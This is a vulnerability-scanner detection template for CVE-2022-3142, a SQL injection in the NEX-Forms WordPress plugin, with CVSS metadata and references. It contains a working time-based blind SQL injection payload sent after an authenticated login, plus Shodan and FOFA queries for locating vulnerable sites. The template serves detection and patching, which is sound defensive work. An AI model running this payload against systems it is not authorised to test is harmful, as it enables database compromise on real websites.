NEX-Forms Plugin < 7.9.7 - SQL Injection

2023-10-1707:20:28

ProjectDiscovery

github.com

cve

cve2022

wpscan

packetstorm

wordpress

sqli

wp-plugin

authenticated

basixonline

sql-injection

security-vulnerability

8.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

0.004 Low

EPSS

Percentile

73.0%

JSON

The NEX-Forms WordPress plugin before 7.9.7 does not properly sanitise and escape user input before using it in SQL statements, leading to SQL injections. The attack can be executed by anyone who is permitted to view the forms statistics chart, by default administrators, however can be configured otherwise via the plugin settings.

id: CVE-2022-3142

info:
  name: NEX-Forms Plugin < 7.9.7 - SQL Injection
  author: r3Y3r53
  severity: high
  description: |
    The NEX-Forms WordPress plugin before 7.9.7 does not properly sanitise and escape user input before using it in SQL statements, leading to SQL injections. The attack can be executed by anyone who is permitted to view the forms statistics chart, by default administrators, however can be configured otherwise via the plugin settings.
  remediation: Fixed in version 7.9.7
  reference:
    - https://wpscan.com/vulnerability/8acc0fc6-efe6-4662-b9ac-6342a7823328/
    - https://www.exploit-db.com/exploits/51042
    - https://nvd.nist.gov/vuln/detail/CVE-2022-3142
    - http://packetstormsecurity.com/files/171477/WordPress-NEX-Forms-SQL-Injection.html
    - https://medium.com/%40elias.hohl/authenticated-sql-injection-vulnerability-in-nex-forms-wordpress-plugin-35b8558dd0f5
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2022-3142
    cwe-id: CWE-89
    epss-score: 0.00356
    epss-percentile: 0.71515
    cpe: cpe:2.3:a:basixonline:nex-forms:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: basixonline
    product: nex-forms
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/nex-forms-express-wp-form-builder/
    fofa-query: body=/wp-content/plugins/nex-forms-express-wp-form-builder/
    publicwww-query: /wp-content/plugins/nex-forms-express-wp-form-builder/
  tags: cve,cve2022,wpscan,packetstorm,wordpress,sqli,wp-plugin,wp,authenticated,basixonline

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        @timeout: 30s
        GET /wp-admin/admin.php?page=nex-forms-dashboard&form_id=1+AND+(SELECT+42+FROM+(SELECT(SLEEP(7)))b)-- HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration>=7'
          - 'status_code_2 == 200'
          - 'contains(body_2, "NEX-Forms")'
          - 'contains(content_type_2, "text/html")'
        condition: and
# digest: 490a004630440220245e5b5001d840be2c17fae954a218594d722ae697e66478c6b43212bfc792d60220371c3f59d70e529a7d7cd5f8c8bcdab4416be17edcf2b5326bd3b255cb2631aa:922c64590222798bb761d5b6d8e72950